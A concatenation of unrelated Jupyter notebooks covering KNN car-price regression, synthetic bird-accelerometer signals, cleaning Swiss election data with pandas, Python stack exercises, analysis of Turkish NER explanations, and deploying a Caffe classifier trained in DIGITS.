All of these features are physical characteristics of a car, except for "symboling". According to the dataset documentation by Schlimmer (2019), this feature is an "insurance risk rating." It elaborates:> Cars are initially assigned a risk factor symbol associated with its price. Then, if it is more risky (or less), this symbol is adjusted by moving it up (or down) the scale. Actuarians call this process "symboling". A value of +3 indicates that the auto is risky, -3 that it is probably pretty safe. Given that this feature is systematically associated with the price of a car, it may be relevant to our model. Thus, we will consider it along with the other numeric features.In order to determine which combination of features is the best, we will use univariate feature selection. "Univariate" refers to the use of a single variable. We will perform a statistical test between each feature and the target. Then, we will select the features with the highest scores from the statistical test (scikit-learn developers, 2021).In our case, we have a regression problem, since we want to predict a continuous variable, car price. Thus, we will use the F-statistic as our score function. According to Frost (2017), the F-statistic indicates the "overall significance" of a linear regression model. In univariate feature selection, we would do the following steps:- For each feature: - Perform linear regression where the independent variable is the feature and the dependent variable is the target (in this case, price). - Obtain the F-statistic.- Compile a list with the F-statistic of each feature.- Identify the features with the highest F-statistics.This can be implemented automatically using the scikit-learn's `SelectKBest` class. It is called `SelectKBest` because we can set a parameter `k` which tells how many features to select. For example, if `k = 3`, the top three features with the highest F-statistic are selected. This is done below:
###Code
#collapse-hide
skb = SelectKBest(
score_func = f_regression,
k = 3,
)
X = cars_df[all_numeric_features]
y = cars_df["price"]
X_new = skb.fit_transform(X, y)
best_features = list(skb.get_feature_names_out())
print("Top 3 features:", best_features)
###Output
Top 3 features: ['curb-weight', 'engine-size', 'horsepower']
###Markdown
The results show that curb weight, engine size, and horsepower are the highest-scoring features. However, we will not select these yet for the final model, since other steps still must be discussed. Train-Test Split with StratificationTrain-test split is the third important technique.Before model training, the dataset has to be split into training and testing sets. We will use 80% of the data in the training set and 20% in the testing set. As the names suggest, the training set is used to train the model or help it *learn* how to predict car prices. Then, we make predictions on the cars on the testing set to see whether the predictions are accurate.Before we split the data, though, we have to ensure that the frequency distribution of the target is similar between the training and testing sets. Below is a histogram of the frequency distribution of car price across the entire dataset:
###Code
#collapse-hide
sns.histplot(cars_df["price"], bins = 100)
plt.title("Frequency Distribution of Car Price")
plt.xlabel("Price (USD)")
plt.ylabel("Number of Cars")
plt.show()
###Output
_____no_output_____
###Markdown
The graph shows a right-skewed distribution, which means that most of the car prices are low and there are outliers with high prices. When we split the data into training and testing sets, we want each set to have a similar distribution to this.De Cock (2011) provides a helpful suggestion on how to do this. The article says, "Simply order the original data set by a variable of interest (such as sale price) and select every kth observation to achieve the desired sample size (k=2 for a 50/50 split or k=4 for a 75/25 split)."In our case, we want an 80/20 split. One-fifth of the data will go to the testing set, so we can use k = 5. We will thus order the observations by price, then assign every 5th observation to the testing set. All other observations will go to the training set.In the code below, I have written a custom function `stratify_continuous` that uses this technique. I then performed a train-test split after stratification. `X_train` and `y_train` refer to the features and target in the training set, respectively. `X_test` and `y_test` are from the testing set.
###Code
#collapse-hide
def stratify_continuous(n_folds, y):
"""Stratify a dataset on a continuous target."""
if n_folds < 2 or n_folds > 10:
raise ValueError("Please select a number of folds from 2 to 10.")
fold_nums = list(range(n_folds))
# DataFrame where "index" column contains the original indices
df = pd.DataFrame(
y
# Shuffle before ranking so that cars with the same price are ordered randomly.
.sample(frac = 1, random_state = 1, ignore_index = False)
)
# This column gives a rank to each value in y. 0 is the rank of the lowest value.
# Ties are broken according to order of appearance.
df["rank"] = df[y.name].rank(method = "first") - 1
df["fold"] = 0
for f in fold_nums[1:]:
# start at f, then increment by n_folds
indices = list(range(f, df.shape[0], n_folds))
df.loc[df["rank"].isin(indices), "fold"] = f
# Revert df to original order of indices
df = df.reindex(index = y.index)
# A series that indicates the fold number of each observation according to its original position in y
fold_series = df["fold"].copy()
return fold_series
folds = stratify_continuous(
n_folds = 5,
y = cars_df["price"],
)
def split_folds(X, y, fold_series, test_fold):
"""Take a dataset whose observations have been grouped into folds,
then perform a train-test split."""
if fold_series.dtype != "int64":
raise AttributeError("The fold list does not purely contain integers.")
test_mask = (fold_series == test_fold)
X_train = X.loc[~test_mask].copy()
y_train = y.loc[~test_mask].copy()
X_test = X.loc[test_mask].copy()
y_test = y.loc[test_mask].copy()
return X_train, X_test, y_train, y_test
X_train, X_test, y_train, y_test = split_folds(
X = cars_df[all_numeric_features],
y = cars_df["price"],
fold_series = folds,
test_fold = 4,
)
# Summary statistics for target columns.
target_df = pd.concat(
[y_train, y_test],
axis = 1,
join = "outer",
)
target_df.columns = ["y_train price", "y_test price"]
target_df.describe()
###Output
_____no_output_____
###Markdown
This table shows summary statistics for the price columns of the two sets. The sets have similar means at around USD 13,200, and they also have similar medians at around USD 10,200.Let us compare the price distributions using KDE plots:
###Code
#collapse-hide
sns.kdeplot(y_train, label = "Training set")
sns.kdeplot(y_test, label = "Testing set")
plt.title("Comparison of Car Prices Between Sets")
plt.xlabel("Price (USD)")
plt.ylabel("Probability Density")
plt.legend()
plt.show()
###Output
_____no_output_____
###Markdown
The KDE plots both seem to follow the same shape and have the same center. This shows that the training and testing sets have roughly the same distribution of car prices. Thus, these were stratified correctly. Hyperparameter OptimizationThe fourth technique is hyperparameter optimization. This involves training the KNN model using different hyperparameter values to see which one performs the best.A hyperparameter is a value that influences the behavior of a model and has no relation to the data. In the case of KNN, one important hyperparameter is the $k$ value, or the number of neighbors used to make a prediction. If $k = 5$, we take the mean price of the top five most similar cars and call this our prediction. However, if $k = 10$, we take the top ten cars, so the mean price may be different.We can optimize $k$ in this way:- Decide values of $k$ to test.- For each $k$ value, fit and evaluate a KNN model.- Identify the best-performing model and use its $k$ value in the final model.In order to evaluate a model, we need an evaluation metric. In our case, we will use the Root Mean Squared Error or RMSE. This is calculated with the following equation:$RMSE = \sqrt{\frac{1}{n} \sum_{i=1}^n (\text{actual}_i - \text{predicted}_i)^2}$- $n$ is the sample size.- $\text{actual}$ is the actual target value, or in this case, the actual price of a car.- $\text{predicted}$ is the predicted target value.RMSE can be interpreted as the average error of a regression model. For example, if $RMSE = 1000$, this means that the model's predicted car prices are USD 1000 away from the actual car prices, on average.Below is an example of hyperparameter optimization using RMSE. All of the numeric features were used for this example.
###Code
#collapse-hide
k_values = [1, 3, 5]
k_rmse = pd.Series(dtype = "float64")
for k in k_values:
knn = KNeighborsRegressor(
n_neighbors = k,
algorithm = "auto",
)
knn.fit(X_train, y_train)
y_pred = knn.predict(X_test)
rmse = np.sqrt(mean_squared_error(y_test, y_pred))
k_rmse.loc[k] = rmse
print("k value and RMSE")
k_rmse
###Output
k value and RMSE
###Markdown
The table above shows that RMSE was lowest for $k = 3$. The RMSE was about USD 3146, which means that on average, the predicted prices are USD 3146 away from the actual prices. K-Fold Cross-Validation The last technique that will be discussed is K-Fold Cross-Validation. Earlier, we split the data into one training set and one testing set. The K-Fold Cross-Validation allows us to obtain a more holistic view of model performance by rotating the observations used in the two sets. In the words of Brownlee (2018), it estimates "how the model is expected to perform in general when used to make predictions on data not used during the training of the model."Here, $k$ has a different meaning. It determines the number of splits to make in a dataset. For example, if $k = 5$, the dataset will be split into 5 folds, each set containing 20% of the total data.In summary, the following steps are performed:- Split the data into 5 folds: A, B, C, D, E.- Use fold A as the testing set and use the others as the training set.- Fit and evaluate a KNN model, thus obtaining RMSE.- Repeat the above process for a total of 5 times, so that each fold is used as a testing set once.- Compile a list of the five RMSE values obtained.- Compute the mean RMSE value. This is the final metric of model performance.K-Fold Cross-Validation can be implemented using scikit-learn's `KFold` and `cross_val_score` . An example of 5-fold cross-validation is shown below.
###Code
#collapse-hide
knn = KNeighborsRegressor(
n_neighbors = 5,
algorithm = "auto",
)
kf = KFold(5, shuffle = True, random_state = 1)
mses = cross_val_score(
estimator = knn,
X = cars_df[all_numeric_features],
y = cars_df["price"],
scoring = "neg_mean_squared_error",
cv = kf,
)
mses = pd.Series(mses)
rmses = mses.abs().pow(1/2)
mean_rmse = rmses.mean()
sd_rmse = rmses.std(ddof = 1)
print(f"""Regular 5-fold cross-validation
Mean RMSE: {mean_rmse:.2f}
Standard Deviation RMSE: {sd_rmse:.2f}
RMSE Values: {rmses.to_list()}""")
###Output
Regular 5-fold cross-validation
Mean RMSE: 3722.28
Standard Deviation RMSE: 565.62
RMSE Values: [3407.8275635020186, 3902.1144860913682, 3009.7340988268425, 4521.314079941105, 3770.3892479494248]
###Markdown
The mean RMSE above presents a better picture of the model's performance because it takes into account different possible combinations of training and testing sets.Note, however, that the standard deviation of the RMSE was around 566. This means that the RMSE values varied by several hundreds of dollars from model to model during the cross-validation. In simpler terms, the model performance was inconsistent. It performed much better when trained on some folds than when it was trained on other folds.Thus, we can take k-fold cross-validation a step further by stratifying the folds so that they will have similar price distributions. This will ensure that each fold is representative of the full sample. Thus, I have written a custom function in the code cell below to do this.
###Code
#collapse-hide
def stratified_kfcv(X, y, fold_series, regression_model):
"""Conduct k-fold cross-validation on a stratified dataset."""
fold_nums = fold_series.unique()
mse_lst = []
for f in fold_nums:
X_train, X_test, y_train, y_test = split_folds(
X = X,
y = y,
test_fold = f,
fold_series = fold_series,
)
regression_model.fit(X_train, y_train)
y_pred = regression_model.predict(X_test)
mse = mean_squared_error(y_test, y_pred)
mse_lst.append(mse)
return mse_lst
knn = KNeighborsRegressor(
n_neighbors = 5,
algorithm = "auto",
)
mse_lst = stratified_kfcv(
X = cars_df[all_numeric_features],
y = cars_df["price"],
fold_series = folds,
regression_model = knn,
)
mse_series = pd.Series(mse_lst)
rmse_series = mse_series.pow(1/2)
mean_rmse = rmse_series.mean()
sd_rmse = rmse_series.std(ddof = 1)
print(f"""Stratified 5-fold cross-validation
Mean RMSE: {mean_rmse:.2f}
Standard Deviation RMSE: {sd_rmse:.2f}
RMSE Values: {rmse_series.to_list()}""")
###Output
Stratified 5-fold cross-validation
Mean RMSE: 3369.44
Standard Deviation RMSE: 387.33
RMSE Values: [3193.0727214096655, 2883.515369146238, 3844.6421242541865, 3674.5947449327227, 3251.39247707809]
###Markdown
The mean RMSE from stratified CV was USD 3369. This is about USD 400 lower than the result of the regular CV, USD 3722.Furthermore, the SD RMSE is equal to 387, which is lower than the previous value of 566. Therefore, the five models trained during cross-validation performed more similarly to each other.Thus, we can see that stratifying observations before k-fold cross-validation can be more effective at approximating the true performance of the model compared to regular k-fold cross-validation. Combining TechniquesIn this part, we will combine all of the discussed techniques to optimize the KNN model.The steps are as follows:- Use the standardized features that were calculated earlier.- For each number `n_features` from 1 to 10: - Perform univariate feature selection using the F-statistic. - Identify the best `n_features` features. - For each number `k` from 1 to 20: - Evaluate the model using stratified 5-fold cross-validation. - For each fold, train a `k` nearest neighbors model using the best features. - Obtain the mean RMSE value.- Compile a list of all mean RMSE values obtained.- Identify the model with the lowest mean RMSE. This is the final model.This is implemented in the code below.
###Code
#collapse-hide
n_feature_list = list(range(1, 11))
result_lst = []
for n_features in n_feature_list:
# Univariate feature selection
skb = SelectKBest(
score_func = f_regression,
k = n_features,
)
X = cars_df[all_numeric_features]
y = cars_df["price"]
X_new = skb.fit_transform(X, y)
# List of "best" features
best_features = list(skb.get_feature_names_out())
k_values = list(range(1, 21))
for k in k_values:
# stratified 5-fold cross validation
knn = KNeighborsRegressor(
# Use a different k value each time
n_neighbors = k,
algorithm = "auto",
)
mse_lst = stratified_kfcv(
X = cars_df[best_features],
y = cars_df["price"],
fold_series = folds,
regression_model = knn,
)
mse_series = pd.Series(mse_lst)
rmse_series = mse_series.pow(1/2)
mean_rmse = rmse_series.mean()
sd_rmse = rmse_series.std(ddof = 1)
new_row = (n_features, best_features, k, mean_rmse, sd_rmse)
result_lst.append(new_row)
result_df = pd.DataFrame(result_lst)
result_df.columns = ["Number of Features", "Best Features", "k Neighbors", "Mean RMSE", "SD RMSE"]
result_df = (
result_df
.sort_values(["Mean RMSE", "SD RMSE"], ascending = True)
.reset_index(drop = True)
)
###Output
_____no_output_____
###Markdown
Before we discuss the top-performing models, let us look at the general trends in the results using some graphs.
###Code
#collapse-hide
sns.lineplot(
data = result_df,
x = "k Neighbors",
y = "Mean RMSE",
hue = "Number of Features",
)
plt.title("Mean RMSE against k Neighbors")
plt.show()
###Output
_____no_output_____
###Markdown
The graph above shows that in general, no matter the number of features, the mean RMSE increased as the number of neighbors (k) increased. Therefore, it is best to have a low k value so that the model makes predictions only using a few cars that are most similar to the car being tested.Next, let us look at a graph with the same variables, except that the number of features is now on the x-axis instead of k.
###Code
#collapse-hide
sns.lineplot(
data = result_df,
x = "Number of Features",
y = "Mean RMSE",
hue = "k Neighbors",
)
plt.title("Mean RMSE against Number of Features")
plt.show()
###Output
_____no_output_____
###Markdown
We can see that for models with a high k value (represented by the darker lines), the mean RMSE increased slightly as the number of features increased.However, for models with a low k value (represented by the lighter pink lines), the mean RMSE stayed the same or even decreased when the number of features increased.Therefore, the best model would be one with a low k value and a medium-to-high number of features.In order to determine this more precisely, let us look at the top 10 models with the lowest RMSE.
###Code
#collapse-hide
result_df.head(10)
###Output
_____no_output_____ |
bird_flapping.ipynb | ###Markdown
As a research of bird behavior I am tracking birds with accelerometers using the https://uva-bits.nl system. To study the birds energy usage I want to create a machine learning model. To train this model I need some artificial data. Real data setThe https://github.com/NLeSC/eEcology-Annotation-UI/raw/master/demo/tracker.json was derived from the uva-bits database of tracker 355 on 2010-06-28.
###Code
import json
import urllib.request
import pandas as pd
with urllib.request.urlopen('https://github.com/NLeSC/eEcology-Annotation-UI/raw/master/demo/tracker.json') as f:
data = json.load(f)
frame = 34
df = pd.DataFrame({
'x': data[frame]['x_acceleration'],
'y': data[frame]['y_acceleration'],
'z': data[frame]['z_acceleration']},
index=data[frame]['time_acceleration']
)
df.info()
df.plot()
###Output
<class 'pandas.core.frame.DataFrame'>
Float64Index: 40 entries, 0.0 to 1.95
Data columns (total 3 columns):
# Column Non-Null Count Dtype
--- ------ -------------- -----
0 x 40 non-null float64
1 y 40 non-null float64
2 z 40 non-null float64
dtypes: float64(3)
memory usage: 1.2 KB
###Markdown
Let us recreate this with sequgen
###Code
import numpy as np
from sequgen.deterministic.sine import sine
from sequgen.deterministic.constant import constant
t_predict = np.linspace(0, 2, 40) # 2 seconds of 20Hz
x = sine(t_predict, wavelength=2/6, amplitude=0.25, phase_shift=0.25) + \
sine(t_predict, wavelength=2/6, amplitude=0.1, phase_shift=0.1) + \
constant(t_predict, -0.2)
z = sine(t_predict,
wavelength=2/6, # 6 flaps in 2 seconds
amplitude=1,
phase_shift=0.05) + constant(t_predict, 1) # add Earths gravity
y = sine(t_predict, wavelength=2/6, amplitude=0.25, phase_shift=0.05) + \
sine(t_predict, wavelength=2/6, amplitude=0.1, phase_shift=0.2)
pd.DataFrame({'x':x, 'y':y, 'z': z}, index=t_predict).plot()
###Output
_____no_output_____ |
09 Pandas Teil 2/dataprojects/wahlen/Clean.ipynb | ###Markdown
Daten putzen So kommen wir vom BFS-Cube zu einem sauberen Datenfile **Quelle:**- Wahlergebnisse beim BFS: Daten gibts beim BFS: https://www.pxweb.bfs.admin.ch/pxweb/de/px-x-1702020000_105/px-x-1702020000_105/px-x-1702020000_105.px Vorbereitung Wir importieren ausnahmsweise etwas mehr Bibliotheken als sonst...
###Code
import pandas as pd
import numpy as np
###Output
_____no_output_____
###Markdown
Daten laden Das wird ein bisschen ein Marathon...- Wir navigieren zuerst zum "Cube" des BFS: https://www.pxweb.bfs.admin.ch/pxweb/de/px-x-1702020000_105/px-x-1702020000_105/px-x-1702020000_105.px **1. Versuch:** Wir laden die Daten mal in csv-Form runter. (sie liegen bereits im Ordner `dataprojects/wahlen/`)
###Code
path = 'px-x-1702020000_105.csv'
#df = pd.read_csv(path)
###Output
_____no_output_____
###Markdown
Schaffen wir das vielleicht mit dem Editor??Probleme:- Encoding- Startet nicht auf Zeile 1- Delimiter Hilfe zur `read()`-Funktion: https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.read_csv.htmlHilfe zum Encoding gibt's hier: - https://docs.python.org/3/library/codecs.htmlstandard-encodings... aber welches Encoding?? Trick: Shell code nutzen mit `!`
###Code
!file -I {path}
df = pd.read_csv(path, delimiter=';', skiprows=2, encoding='latin_1')
df.head(5)
###Output
_____no_output_____
###Markdown
Das ist hübsch... aber:- die Gemeinden haben grässlichen Vorzeichen- es fehlen die wichtigen Gemeindenummern! **2. Versuch:** Wir probieren es mit Excel
###Code
path = 'px-x-1702020000_105.xlsx'
df = pd.read_excel(path)
df.head(10)
###Output
_____no_output_____
###Markdown
... das sieht auch nicht gerade sehr erquickend aus!!
###Code
df = pd.read_excel(path, skiprows=2)
df.head(5)
###Output
_____no_output_____
###Markdown
- Wir müssen Spaltennamen erfinden...
###Code
columns = ['Gemeinde_ID', 'Gemeinde_Name', 'Jahr', 'Jahr2', 'Partei_ID', 'Partei_Name', 'Partei_Anteil']
df = pd.read_excel(path, skiprows=2, names=columns)
df.head(10)
###Output
_____no_output_____
###Markdown
... aber was ist mit den vielen Nan's??Wir müssen mehr Zeilen anzeigen...
###Code
df.head(100)
###Output
_____no_output_____
###Markdown
Wir brauchen NOCH MEHR ZEILEN! Wie geht das? https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.set_option.html
###Code
pd.set_option("display.max_rows", 100)
df.head(100)
###Output
_____no_output_____
###Markdown
Wir müssen die fehlenden Felder füllen!Pandas hat dafür eine SEHR PRAKTISCHE FUNKTION: `ffill()`
###Code
df = df.ffill()
df.head(100)
###Output
_____no_output_____
###Markdown
Kucken wir uns zur Sicherheit noch den Schluss an:
###Code
df.tail(100)
###Output
_____no_output_____
###Markdown
Oh oh... wir haben noch Abfall am Ende!Wir können das mit einem einfachen Trick beseitigen:
###Code
df = df[0:115632]
df
###Output
_____no_output_____
###Markdown
**Aber...**... bevor wir jetzt endgültig mit der Analyse beginnen, müssen wir noch etwas investieren Daten reinigen Wir müssen die drei Punkte ersetzen durch NaN
###Code
df['Partei_Anteil'] = df['Partei_Anteil'].replace('...', np.nan)
df
###Output
_____no_output_____
###Markdown
- Wozu genau ist die zweite Jahresspalte da??? Weg damit.
###Code
df = df.drop(columns=['Jahr2'])
df
###Output
_____no_output_____
###Markdown
- Bezirke? Wollen wir nicht! (Der `.str[]`-Operator ist hierfür handy)
###Code
df['Gemeinde_Name'].str[0:2] == '>>'
df = df.drop(index=df[df['Gemeinde_Name'].str[0:2] == '>>'].index)
df
###Output
_____no_output_____
###Markdown
- Die Punkte vor dem Gemeindenamen... können auch noch weg
###Code
df['Gemeinde_Name'] = df['Gemeinde_Name'].str.replace('......', '', regex=False)
df.head()
###Output
_____no_output_____
###Markdown
- Die Gemeinde_ID, das Jahr und die Partei_ID sind integer
###Code
df['Gemeinde_ID'] = df['Gemeinde_ID'].astype(int)
df['Jahr'] = df['Jahr'].astype(int)
df['Partei_ID'] = df['Partei_ID'].astype(int)
df.head()
df
###Output
_____no_output_____
###Markdown
Jeeeetzt sind wir fertig und können mit der Analyse beginnen.Wir exportieren das File. Struktur modifizieren
###Code
df2 = pd.pivot_table(df, index=['Gemeinde_ID', 'Gemeinde_Name', 'Partei_Name'], columns='Jahr', values='Partei_Anteil')
df2
df2 = df2.reset_index()
df2
###Output
_____no_output_____
###Markdown
Export
###Code
df2.to_csv("Wahlergebnisse 1999 und 2019 in Gemeinden.csv", index=False)
###Output
_____no_output_____ |
Coding-Ninjas-Data-Structure-and-Algorithm-in-Python-main/Stack/All codes in one.ipynb | ###Markdown
Code : Stack Using LL
###Code
from sys import stdin
class Node :
def __init__(self, data) :
self.data = data
self.next = None
class Stack :
def __init__(self) :
self.__head = None
self.__size = 0
def getSize(self) :
return self.__size
def isEmpty(self) :
return self.__size == 0
def push(self, data) :
newNode = Node(data)
if self.__head is None :
self.__head = newNode
else :
newNode.next = self.__head
self.__head= newNode
self.__size += 1
def pop(self) :
if self.__head is None :
return -1
ans = self.__head.data
self.__head = self.__head.next
self.__size -= 1
return ans
def top(self) :
if self.__head is None :
return -1
return self.__head.data
#main
q = int(stdin.readline().strip())
stack = Stack()
while q > 0 :
inputs = stdin.readline().strip().split(" ")
choice = int(inputs[0])
if choice == 1 :
data = int(inputs[1])
stack.push(data)
elif choice == 2 :
print(stack.pop())
elif choice == 3 :
print(stack.top())
elif choice == 4 :
print(stack.getSize())
else :
if stack.isEmpty() :
print("true")
else :
print("false")
q -= 1
###Output
_____no_output_____
###Markdown
Balanced Paranthesis
###Code
from sys import stdin
def isEmpty(stack) :
return len(stack) == 0
def isBalanced(expression) :
stack = list()
for i in range(len(expression)) :
if expression[i] == '(' :
stack.append(expression[i])
elif expression[i] == ')' :
if isEmpty(stack) :
return False
topChar = stack.pop();
if expression[i] == ')' and topChar == '(' :
continue
else :
return False
return isEmpty(stack);
#main
expression = stdin.readline().strip()
if isBalanced(expression) :
print("true")
else :
print("false")
###Output
_____no_output_____
###Markdown
Reverse Stack
###Code
from sys import stdin, setrecursionlimit
setrecursionlimit(10 ** 6)
def reverseStack(inputStack, extraStack) :
if len(inputStack) == 0:
return;
lastElement = inputStack.pop()
reverseStack(inputStack, extraStack);
while not isEmpty(inputStack) :
top = inputStack.pop()
extraStack.append(top)
inputStack.append(lastElement)
while not isEmpty(extraStack) :
top = extraStack.pop()
inputStack.append(top)
'''-------------- Utility Functions --------------'''
#Takes a list as a stack and returns whether the stack is empty or not
def isEmpty(stack) :
return len(stack) == 0
#Taking input using fast I/o method
def takeInput() :
size = int(stdin.readline().strip())
inputStack = list()
if size == 0 :
return inputStack
values = list(map(int, stdin.readline().strip().split(" ")))
inputStack = values
return inputStack
#main
inputStack = takeInput()
emptyStack = list()
reverseStack(inputStack, emptyStack)
while not isEmpty(inputStack) :
print(inputStack.pop(), end = " ")
###Output
_____no_output_____
###Markdown
Check redundant brackets
###Code
from sys import stdin
def checkRedundantBrackets(expression) :
stk = list()
for i in range(len(expression)) :
if (expression[i] == '(') or (find(expression[i])) :
stk.append(expression[i])
elif expression[i] == ')' :
hasOperator = False
while not isEmpty(stk) and top(stk) != '(' :
stk.pop()
hasOperator = True
if not hasOperator :
return True
if not isEmpty(stk) :
stk.pop()
return False
'''-------------- Utility Functions --------------'''
def find(ch) :
if ch == '+' or ch == '-' or ch == '*' or ch == '/' :
return True
return False
#Takes a list as a stack and returns whether the stack is empty or not
def isEmpty(stack) :
return len(stack) == 0
#Takes a list as a stack and returns the element at the top
def top(stack) :
#assuming the stack is never empty
return stack[len(stack) - 1]
#main
expression = stdin.readline().strip()
if checkRedundantBrackets(expression) :
print("true")
else :
print("false")
###Output
_____no_output_____
###Markdown
Stock Span
###Code
from sys import stdin
def stockSpan(price, n) :
stk = list()
output = [-1] * n
stk.append(0)
output[0] = 1
for i in range(1, n) :
while (not isEmpty(stk)) and (price[top(stk)] < price[i]) :
stk.pop()
if isEmpty(stk) :
output[i] = i + 1
else :
output[i] = i - top(stk)
stk.append(i)
return output
'''-------------- Utility Functions --------------'''
#Takes a list as a stack and returns whether the stack is empty or not
def isEmpty(stack) :
return len(stack) == 0
#Takes a list as a stack and returns the element at the top
def top(stack) :
#assuming the stack is never empty
return stack[len(stack) - 1]
def printList(arr) :
for i in range(len(arr)) :
print(arr[i], end = " ")
print()
def takeInput():
size = int(stdin.readline().strip())
if size == 0 :
return list(), 0
price = list(map(int, stdin.readline().strip().split(" ")))
return price, size
#main
price, n = takeInput()
output = stockSpan(price, n)
printList(output)
###Output
_____no_output_____
###Markdown
Minimum bracket Reversal
###Code
from sys import stdin
def countBracketReversals(inputString) :
length = len(inputString)
if length == 0 :
return 0
if length % 2 != 0 :
return -1 # Only even number of brackets can be balanced
stack = list()
for i in range(length) :
currentChar = inputString[i]
if currentChar == '{' :
stack.append(currentChar)
else :
# Pop if there is a balanced pair
if (not isEmpty(stack)) and (top(stack) == '{') :
stack.pop()
else :
stack.append(currentChar)
count = 0
#Only unbalanced brackets are there in stack now
while not isEmpty(stack) :
char1 = stack.pop()
char2 = stack.pop()
'''
When char1 = } and char2 = {, then we need to reverse both of them
so count will increase by 2
'''
if char1 != char2 :
count += 2
else :
count += 1
return count
'''-------------- Utility Functions --------------'''
#Takes a list as a stack and returns whether the stack is empty or not
def isEmpty(stack) :
return len(stack) == 0
#Takes a list as a stack and returns the element at the top
def top(stack) :
#assuming the stack is never empty
return stack[len(stack) - 1]
#main
print(countBracketReversals(stdin.readline().strip()))
###Output
_____no_output_____ |
toolkit/xnlp/Explanations Analysis Run 02 - Turkish.ipynb | ###Markdown
LOC type entities - analysis
###Code
loc_group_explanations = explanations[explanations['entity_type'] == "LOC"].drop(["sentence_idx", "entity_type", "entity_start", "entity_end"], axis=1)
loc_group_explanations['Loc'].clip(lower=-1.0, upper=1, inplace=False)
len(morpho_tag_to_id)
loc_group_explanations.size
for idx, morpho_tag in enumerate(list(morpho_tag_to_id.keys())):
if idx % 9 == 0:
fig = plt.figure(int(idx/9))
rem = idx % 9
plt.subplot(3, 3, rem+1)
print(morpho_tag)
# sns.violinplot(data=list(loc_group_explanations[morpho_tag].clip(lower=-0.5, upper=0.5)))
data = loc_group_explanations[morpho_tag].dropna().clip(lower=-0.5, upper=0.5)
print(data)
if data.size > 0:
sns.distplot(data)
plt.show()
loc_group_explanations
mean_loc_group_explanations = loc_group_explanations.mean()
mean_loc_group_explanations.sort_values(ascending=False)
loc_group_explanations['Loc'].sort_values()[:10]
loc_group_explanations['Loc'].sort_values(ascending=False)[:10]
loc_group_explanations.hist(['Loc'], range=[-1, 1], bins=100)
loc_group_explanations.hist(['Loc'], range=[-0.015, 0.015], bins=100)
loc_group_explanations['Loc'].value_counts().sort_values(ascending=False)
[(loc_group_explanations['Loc'][loc_group_explanations['Loc'] < 0]).mean(),
(loc_group_explanations['Loc'][loc_group_explanations['Loc'] >= 0]).mean()]
loc_group_explanations.hist(['Loc^DB'], range=[-1, 1])
loc_group_explanations.hist(['Loc'])
loc_group_explanations.hist(['Loc^DB'])
loc_group_explanations.hist(['Loc'], range=[-5000, -10], bins=100)
loc_group_explanations.hist(['Loc'], range=[1, 1000], bins=100)
loc_group_explanations['Loc'][loc_group_explanations['Loc'] < 0].count()
loc_group_explanations['Loc'][loc_group_explanations['Loc'] >= 0].count()
for morpho_tag in ['Loc', 'Loc^DB']:
below_zero = loc_group_explanations[morpho_tag][loc_group_explanations[morpho_tag] < 0].count()
above_zero = loc_group_explanations[morpho_tag][loc_group_explanations[morpho_tag] >= 0].count()
print(morpho_tag, below_zero, above_zero)
###Output
Loc 2681 1818
Loc^DB 653 523
###Markdown
ORG type entities - analysis
###Code
org_group_explanations = explanations[explanations['entity_type'] == "ORG"].drop(["sentence_idx", "entity_type", "entity_start", "entity_end"], axis=1)
org_group_explanations.mean().sort_values(ascending=False)
###Output
_____no_output_____
###Markdown
PER type entities - analysis
###Code
per_group_explanations = explanations[explanations['entity_type'] == "PER"].drop(["sentence_idx", "entity_type", "entity_start", "entity_end"], axis=1)
per_group_explanations.mean().sort_values(ascending=False)
!ls ../../explanations-for-ner-train-finnish-201901*
###Output
_____no_output_____ |
NVIDIA Training/Deployment.ipynb | ###Markdown
Deployment Which files constitute a "model"?We make a trained network useful by removing it from its training environment and "deploying" it into an application. Start where we left off in DIGITS.DIGITS places the files we need to deploy in a directory that can either be downloaded or just pointed to. Since we're going to be deploying our model on the same server where it was trained, we can just point to the folder path that DIGITS generates. Open DIGITS.From DIGITS home page, select the model that we named "Dogs vs. Cats".DIGITS' "Job Page" for the model is what you see as soon as you create the model, when it is training, and/or if you select the model under DIGITS' "model" tab. The Job Directory is in the top left.**Copy the job directory (highlighted above) and replace FIXME in the code block below. Once you've copied the directory, execute the cell (Shift+Enter) to store it to the variable MODEL_JOB_DIR**
###Code
MODEL_JOB_DIR = '##FIXME##' ## Remember to set this to be the job directory for your model
!ls $MODEL_JOB_DIR
###Output
_____no_output_____
###Markdown
Assuming you copied and pasted well, you will see a list of all files in that directory. If the following instructions do not match what you're seeing, check the copy/paste directions.Again, our "model" consists of two files: the architecture and the weights. The architecture is the file called ```deploy.prototxt``` and the weights are in the most recent snapshot file ```snapshot_iter_.caffemodel.```In this case, snapshot number 735 contains the weights learned after all 5 epochs.
###Code
ARCHITECTURE = MODEL_JOB_DIR + '/' + 'deploy.prototxt'
WEIGHTS = MODEL_JOB_DIR + '/' + 'snapshot_iter_735.caffemodel'
print ("Filepath to Architecture = " + ARCHITECTURE)
print("Filepath to weights = "+ WEIGHTS)
###Output
_____no_output_____
###Markdown
Next, we need to make sure that the program that we're building can both read and process those files. For this basic type of deployment, we'll need to install (or include) the framework that they were written in to be able to interpret them. We'll learn to deploy to environments that don't require installing the framework later in this course. We'll also need to use the GPU to take advantage of parallel processing. Again, our model consists of hundreds of thousands of operations that can be largely accelerated through parallelization.
###Code
import caffe
caffe.set_mode_gpu()
###Output
_____no_output_____
###Markdown
Next, we'll create a "Classifier" object called "net". The more common the workflow, the easier existing tools will make your project. In this case, image classification is very common, so this next code block simply takes your architecture file and weights file and a bit about the data and makes common actions easy.
###Code
# Initialize the Caffe model using the model trained in DIGITS
net = caffe.Classifier(ARCHITECTURE, WEIGHTS,
channel_swap =(2, 1, 0), #Color images have three channels, Red, Green, and Blue.
raw_scale=255) #Each pixel value is a number between 0 and 255
#Each "channel" of our images are 256 x 256
###Output
_____no_output_____
###Markdown
The Classifier class includes a method called "predict", which takes an input of an image as defined above and generates an output of the likelihood of the image belonging to each category. Creating an Expected Input: PreprocessingTo start with something easy, let's attempt to correctly classify a labeled image from the dataset. We can load the image and view it by running the cell below.
###Code
import matplotlib.pyplot as plt #matplotlib.pyplot allows us to visualize results
input_image= caffe.io.load_image('/dli/data/dogscats/train/cats/cat.10941.jpg')
plt.imshow(input_image)
plt.show()
###Output
_____no_output_____
###Markdown
